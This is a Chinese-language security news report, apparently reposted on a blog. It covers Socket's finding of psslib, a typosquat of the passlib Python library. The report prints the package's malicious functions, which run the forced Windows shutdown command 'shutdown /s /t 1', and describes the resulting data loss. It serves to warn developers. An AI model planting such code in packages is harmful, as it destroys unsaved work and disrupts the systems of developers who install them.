Socket威胁研究团队发现一个名为psslib的恶意Python包,该软件包伪装成提供密码安全功能,实则会突然关闭Windows系统。这个由化名umaraq的威胁行为者开发的软件包,是对知名密码哈希工具库passlib的拼写错误仿冒(typosquatting)。passlib作为数百万开发者信赖的工具库,每月下载量超过890万次。
恶意代码工作机制
该恶意包通过名为spc()的函数伪装密码保护功能,使用easygui.enterbox()获取用户输入。当输入值与预设密码不匹配时,会立即执行Windows关机命令(shutdown /s /t 1),使系统在一秒内关闭:
def spc(password):
# 恶意代码:输入错误时强制系统关机
if easygui.enterbox('enter password:-') != password:
os.system("shutdown /s /t 1") # 1秒后关机
此外,psslib还包含两个无需任何验证即可关闭系统的函数:
def src():
# 无需用户输入直接强制关机
os.system("shutdown /s /t 1")
def error(message):
# 写入错误信息后强制关机
sys.stderr.write(message)
os.system("shutdown /s /t 1")
攻击影响与针对性
Socket指出,这种恶意软件专门针对基于Windows的开发环境。当开发者在具有提升权限的环境中运行时,即使有限使用该库也会立即危及系统。攻击将导致:
- 未保存工作和数据丢失
- 打开的文件和数据库损坏
- 运行中的服务中断
虽然由于操作系统命令差异,该恶意负载在Linux或macOS上会无害失效,但其针对Windows的特性显示出明确的攻击意图。Socket的AI扫描器已将该包标记为恶意软件,因其具有破坏性系统关机行为。
扫一扫
500
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
